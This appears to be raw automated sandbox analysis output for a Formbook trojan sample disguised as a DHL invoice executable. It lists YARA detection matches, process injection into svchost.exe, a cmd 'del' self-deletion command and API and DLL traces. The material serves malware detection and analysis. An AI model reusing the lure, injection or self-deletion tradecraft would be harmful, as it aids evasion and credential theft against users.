Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 007AF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00783F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0078373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0073E2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0073DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 020E3F92 appears 132 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0210F970 appears 84 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0209DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 020E373B appears 253 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0209E2A8 appears 60 times
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347661877.0000000002D20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347542892.0000000002B0D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348923807.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesvchost.exej% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/4@13/5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B37B5 GetLastError,FormatMessageW, 0_2_012B37B5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A10BF AdjustTokenPrivileges,CloseHandle, 0_2_012A10BF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_012A16C3
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_012B51CD
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_012CA67C
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_012B648E
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_012442A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe File created: C:\Users\user\AppData\Local\Temp\aut6C1C.tmp
Source: C:\Windows\SysWOW64\cmd.exe Console Write (UTF-16 buffer, printable text decoded): C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exe Console Write (UTF-16 buffer, printable text decoded): Access is denied.
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe Section loaded: van.dll
Source: C:\Windows\explorer.exe Section loaded: rasapi32.dll
Source: C:\Windows\explorer.exe Section loaded: rasman.dll
Source: C:\Windows\explorer.exe Section loaded: wlanhlp.dll
Source: C:\Windows\explorer.exe Section loaded: onex.dll
Source: C:\Windows\explorer.exe Section loaded: eappprxy.dll
Source: C:\Windows\explorer.exe Section loaded: eappcfg.dll
Source: C:\Windows\explorer.exe Section loaded: rasapi32.dll
Source: C:\Windows\explorer.exe Section loaded: rasman.dll
Source: C:\Windows\explorer.exe Section loaded: wlanhlp.dll
Source: C:\Windows\explorer.exe Section loaded: onex.dll
Source: C:\Windows\explorer.exe Section loaded: eappprxy.dll
Source: C:\Windows\explorer.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0BF754AA-C967-445C-AB3D-D8FDA9BAE7EF}\InProcServer32
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static file information: File size 1120256 > 1048576
Source: C:\Windows\explorer.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_012442DE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_01260A76 push ecx; ret 0_2_01260A89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004191ED push ecx; iretd 2_2_004191EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F365 pushad ; ret 2_2_0040F36D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418389 push esp; iretd 2_2_0041838B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004164DA push edi; retf 2_2_004164FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D4FB push eax; ret 2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D55C push eax; ret 2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00407726 push esp; iretd 2_2_00407729
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0073DFA1 push ecx; ret 2_2_0073DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038E9B5 push esp; retn 0000h 2_2_0038EAE7
